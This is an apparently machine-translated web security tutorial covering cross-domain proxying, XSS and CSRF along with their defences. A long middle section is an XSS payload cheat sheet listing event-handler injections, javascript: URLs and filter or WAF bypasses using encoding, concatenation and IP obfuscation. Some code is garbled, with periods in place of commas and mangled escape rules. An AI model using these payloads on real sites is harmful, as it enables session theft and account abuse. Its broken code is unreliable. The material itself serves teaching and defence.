var xhr = new XMLHttpRequest(); // Front-end switch: whether the browser reads and writes cookies xhr.withCredentials = true; // Access the proxy server in nginx xhr.open('get'.'http://www.domain1.com:81/?user=admin'.true); xhr.send(); 2.Nodejs example:var http = require('http'); var server = http.createServer(); var qs = require('querystring'); server.on('request'.function(req, res) { var params = qs.parse(req.url.substring(2)); // Write cookies to the front desk res.writeHead(200, { 'Set-Cookie': 'l=a123456; Path=/; Domain=www.domain2.com; HttpOnly' // HttpOnly: the script cannot read }); res.write(JSON.stringify(params)); res.end(); }); server.listen('8080'); console.log('Server is running at port 8080... '); Copy the code
Nodejs middleware proxies cross domains
Node middleware implements cross-domain proxy, which is roughly the same as nginx. It starts a proxy server to forward data. It can also modify the domain name in the cookie in the response header by setting the cookieDomainRewrite parameter to implement cookie writing in the current domain, facilitating interface login authentication.
Non-vue framework cross-domain (twice cross-domain)
Build a proxy server with Node + Express + HTTP-proxy-middleware. 1.) Front-end code examples:
var xhr = new XMLHttpRequest();
// Front-end switch: whether the browser reads and writes cookies
xhr.withCredentials = true;
// Access the HTTP-proxy-Middleware proxy server
xhr.open('get'.'http://www.domain1.com:3000/login?user=admin'.true);
xhr.send();
2.) Middleware server:var express = require('express');
var proxy = require('http-proxy-middleware');
var app = express();
app.use('/', proxy({
// Proxy cross-domain target interface
target: 'http://www.domain2.com:8080'.changeOrigin: true.// Modify the response header information to cross-domain and allow cookies
onProxyRes: function(proxyRes, req, res) {
res.header('Access-Control-Allow-Origin'.'http://www.domain1.com');
res.header('Access-Control-Allow-Credentials'.'true');
},
// Change the cookie domain name in the response information
cookieDomainRewrite: 'www.domain1.com' // The value can be false, indicating no change
}));
app.listen(3000);
console.log('Proxy server is listen at port 3000... ');
Copy the code
XSS
Cross Site Scripting (XSS) refers to the ability of malicious attackers to add code to web pages by taking advantage of sites that do not escape or filter data submitted by users. Make other users access to execute the corresponding embedded code.
An attack that steals user information, uses user identity to perform certain actions, or attacks visitors with viruses.
The hazards of XSS attacks include:
- Get page data
- To obtain
cookie
- Hijack front-end logic
- Send the request
- Stealing arbitrary data from websites
- Steal user information
- Steal user passwords and logins
- Cheat users
XSS attack classification
reflective
Direct injection via URL parameters.
When a request is made, the XSS code appears in the URL and is submitted to the server as input. The server parses and returns, and the XSS code is sent back to the browser along with the response, and the browser finally executes the XSS code. This process is called reflective XSS because it is like a reflection.
For example
A link in which the query field contains a script tag whose SRC is the malicious code. The user clicks on the link and sends a request to the server. The server returns with the XSS code, and the browser writes the query results to Html.
Not all urls that do not contain script tags in their urls are safe, and short urls can be used to make urls very short.
Storage type
The stored XSS is saved to the database, and the code is executed on the browser side of the visiting user when other users access (front-end) the data.
For example
For example, an attacker writes a script tag to a comment on an article. The comment is saved to the database and executed when other users see the article.
XSS attack injection point
HTML
Node content- If a node content is dynamically generated and the content contains user input.
HTML
attribute- Some node attribute values are generated from user input. Then it may be added after closing the tag
script
The label.
- Some node attribute values are generated from user input. Then it may be added after closing the tag
<img src="${image}"/>
<img src="1" onerror="alert(1)" />
Copy the code
Javascript
codeJS
Contains variables injected by the background or information entered by the user.
var data = "#{data}";
var data = "hello"; alert(1);"";
Copy the code
- The rich text
XSS defenses
There are generally two ways to defend against XSS attacks.
- Escape character
CSP
Content security Policy
Escape character
-
Normal input-encoding
- Perform on user input data
HTML Entity
Encoding (using escape characters) - “
- &
- <
- >
- The blank space
- Perform on user input data
-
Rich text – Filtering (Blacklist, whitelist)
- Remove uploaded
DOM
Properties, such asonerror
Etc. - Remove user uploads
style
Nodes,script
Nodes,iframe
Nodes etc.
- Remove uploaded
-
A is
- Avoid direct confrontation
HTML Entity
decoding - use
DOM Parse
Convert, correct unpairedDOM
Tags and Attributes
- Avoid direct confrontation
For strings that appear in the DOM (user data) :
< escape to \<
> < span style = “box-sizing: border-box! Important;
For data that may appear on DOM element attributes
-
“Escaped as \”;
-
‘escaped as \&9039;
-
The space escape is This can result in multiple consecutive Spaces, and you can leave the Spaces unescaped, but be sure to double quote the attributes
-
The ampersand character must be escaped first in the transfer function
Avoid insertions in JS
var data = "#{data}";
var data = "hello"; alert(1);"";
Copy the code
Because the variable is wrapped in quotes, and because the attack is prematurely terminated, all you have to do is escape the quotes
First \\ -> \\\\ then "-> \"Copy the code
The rich text
Filter according to blacklist: script, etc
function xssFilter = function (html) {
html = html.replace(/<\s*\/? script\s*>/g.' ');
html = html.replace(/javascript:[^'"]/g.' ');
html = html.replace(/onerror\s*=\s*['"]? ["] * [' "^ ']? /g.' ');
//....
return html;
}
Copy the code
Filter by whitelist: Only certain tags and attributes are allowed
How to do it: Parse the HTML into a tree structure. For the DOM tree, look one by one to see if there are valid tags and attributes. If not, remove them.
Using Cheerio you can quickly parse the DOM
function xssFilter (html) {
const cheerio = require('cheerio');
const $ = cheerio.load(html);
/ / white list
const whiteList = {'img': ['src']}
$(The '*').each((index, elem) = > {
if(! whiteList[elem.name]) { $(elem).remove();return;
}
for(let attr in elem.attribs) {
if(whiteList[elem.name].indexOf(attr) === -1) {
$(elem).attr(attr, null); }}})return html;
}
Copy the code
Use the NPM package to simplify operations
XSS document
CSP content security policy
A CSP is essentially a whitelist where the developer explicitly tells the browser which external resources can be loaded and executed. We just need to configure the rules, how to intercept is up to the browser implementation. We can minimize XSS attacks in this way.
CSP can usually be turned on in two ways:
- Set up the
HTTP Header
In theContent-Security-Policy
- How to set the meta tag
<meta http-equiv="Content-Security-Policy">
Take setting HTTP headers as an example
- Only site resources are allowed to be loaded
The Content ws-security - Policy: the default - SRC 'self'Copy the code
- Images can only be loaded using HTTPS
Content-Security-Policy: img-src https://*
Copy the code
- Allows loading of any source framework
Content-Security-Policy: child-src 'none'
Copy the code
CSP ( Content Security Policy )
XSS injection method
Reference link: xz.aliyun.com/t/4067
<script>
<script>alert("xss"); </script>Copy the code
<img>
<img src=1 onerror=alert("xss"); >Copy the code
<input>
<input onfocus="alert('xss');" <input onblur=alert(" XSS ") autofocus><input autofocus> executes its own focus event via the autofocus attribute, <input onfocus="alert(' XSS ');" <input onfocus="alert(' XSS '); autofocus>Copy the code
<details>
<details ontoggle="alert('xss');" <details open ontoggle="alert(' XSS ');" >Copy the code
<svg>
<svg onload=alert("xss"); >Copy the code
<select>
<select onfocus=alert(1)></select> executes its own focus event via the autofocus attribute. <select onfocus=alert(1) autofocus>Copy the code
<iframe>
<iframe onload=alert("xss"); ></iframe>Copy the code
<video>
<video><source onerror="alert(1)">
Copy the code
<audio>
<audio src=x onerror=alert("xss"); >Copy the code
<body>
<body/onload=alert("xss"); >Copy the code
Using line breaks and Autofocus, the OnScroll event is automatically triggered without the user having to trigger it
<body onscroll=alert("xss"); ><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br ><br><br><br><br><br><br><br><br><br><br><input autofocus>Copy the code
<textarea>
<textarea onfocus=alert("xss"); autofocus>
Copy the code
<keygen>
<keygen autofocus onfocus=alert(1)Copy the code
<marquee>
<marquee onstart=alert(" XSS ")></marqueeCopy the code
<isindex>
< isIndex type=image SRC =1 onerror=alert(" XSS ")Copy the code
Include JS files remotely using link
PS: Only in the case of no CSP
< link rel = import href = "http://127.0.0.1/1.js" >Copy the code
Javascript pseudo agreement
< a > tag
<a href="javascript:alert(`xss`);" >xss</a>Copy the code
The < iframe > tag
<iframe src=javascript:alert('xss'); ></iframe>Copy the code
The < img > tag
< img SRC = javascript: alert (' XSS) > / / IE7Copy the code
The < form > tag
<form action="Javascript:alert(1)"><input type=submit>
Copy the code
other
Expression attribute
<img style=" XSS :expression(alert(' XSS '))"> <div style="color: RGB (' �x:expression(alert(1)))"></div <style>#test{x:expression(alert(/XSS/))}</styleCopy the code
The background
<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6Copy the code
In the case of filtering
Filtering the blank space
Use/instead of Spaces
<img/src=”x”/onerror=alert(“xss”); >
Filter keyword
Case bypass
<ImG sRc=x onerRor=alert(“xss”); >
Double write the keyword
Some WAFs may replace only once and the replacement is null, in which case we can consider double-write keyword bypass
<imimgg srsrcc=x onerror=alert(“xss”); >
Characters joining together
Using the eval
<img src=”x” onerror=”a=`aler`; b=`t`; c='(`xss`); ‘; eval(a+b+c)”>
Using the top
<script>top["al"+"ert"](`xss`); </script>Copy the code
Other character obfuscation
Some WAFs may use regular expressions to detect XSS attacks. If we can fuzz out the regular rules, we can use other characters to obfuscate our injected code. Here are a few simple examples
1.<<script>alert(" XSS "); //<</script> 2.<title><img src=</title>><img src=x onerror="alert(`xss`);" <SCRIPT>var a="\\"; alert("xss"); / / "; </SCRIPT>Copy the code
Code to bypass
Unicode bypass
<img src=”x” onerror=”alert(“xss”);” >
<img src=”x” onerror=”eval(‘\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b’)”>
Url encoding bypass
<img src=”x” onerror=”eval(unescape(‘%61%6c%65%72%74%28%22%78%73%73%22%29%3b’))”>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Copy the code
Ascii bypass
< img SRC = “x” onerror = “eval (String. FromCharCode,40,34,120,115,115,34,41,59 (97108101114116)” >
Hex bypass
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
Copy the code
octal
<img src=x onerror=alert('\170\163\163')>
Copy the code
Base64 bypass
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"> <iframe src="data:text/html; base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">Copy the code
Filter double quotes, single quotes
1. If it’s an HTML tag, we don’t need quotes. If it is in JS, we can use backquotes instead of single and double quotes
<img src="x" onerror=alert(`xss`); >Copy the code
2. Use code bypass. I won’t go over the examples above
Filter bracket
You can use throw to bypass parentheses when they are filtered
<svg/onload="window.onerror=eval; throw'=alert\x281\x29';" >Copy the code
Filtering URL Addresses
Using URL encoding
<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
Copy the code
Use the IP
1. Decimal IP address
<img src="x" onerror=document.location=`http://2130706433/`>
Copy the code
Octal IP
< img SRC = "x" onerror = document. Location = ` ` http://0177.0.0.01/ >Copy the code
3.hex
< img SRC = "x" onerror = document. Location = ` ` http://0x7f.0x0.0x0.0x1/ >Copy the code
4. The // tag can be used instead of http://
<img src="x" onerror=document.location=`//www.baidu.com`>
Copy the code
CSRF
The impact of other sites on this site when opening the same browser. The principle is that the attacker constructs a back-end request address to induce users to click or automatically initiate a request through some means. If the user is logged in, the backend assumes that the user is operating and performs the corresponding logic.
For example, the user opens site A and phishing at the same time. Suppose site A has an interface to submit user comments via GET requests, then an attacker can add A picture to the phishing site, the address of which is the comment interface.
<img src="http://www.domain.com/xxx?comment='attack'"/>
Copy the code
CSRF attack mechanism
- The user logs in to website A
- A Website identification (cookie to client)
- Initiate A request from the page of WEBSITE B to website A (with the identity of website A)
CSRF defense
Get
Request not to modify data- Prevent third party websites from accessing users
Cookie
- Prevents third party websites from requesting interfaces
- The request is accompanied by verification information, such as a captcha or
Token
SameSite
- Can be
Cookie
Set up theSameSite
Properties. This property representsCookie
Not being sent along with cross-domain requests can be greatly reducedCSRF
But this property is not currently compatible with all browsers.
- Can be
Token
validationcookie
It is automatically put on when it is sent, not actively put onToken
, so actively send each time you sendToken
Referer
validation- For the need to prevent
CSRF
The request we can verifyReferer
To determine whether the request was initiated by a third-party website.
- For the need to prevent
- Hide the token
- Actively add token information to the HTTP header
Prohibit cookies on third-party websites
Same – site property. Set cookies to be carried only by requests from the same site
CSRF worms
If a user opens the attacked web page and the user accesses the attacker’s web page at the same time. Then the attacker’s web page will use the identity of the user to send some requests, and the identity of the common user to post some comments or articles, which contain the attacker’s web page links. If other users see this user’s comment, they can not even click on it, and other users will use their identity to send some malicious requests. So the spread of the virus will be faster and faster, and the impact will be bigger and bigger.
CSRF attack hazards
- Use the user login state
- The user doesn’t know
- Complete the business request
- Steal users’ funds
- Pretend to be user post back pot
- Defamation of the website
The last
Article so far, thank you for reading, one key three even is the biggest support for me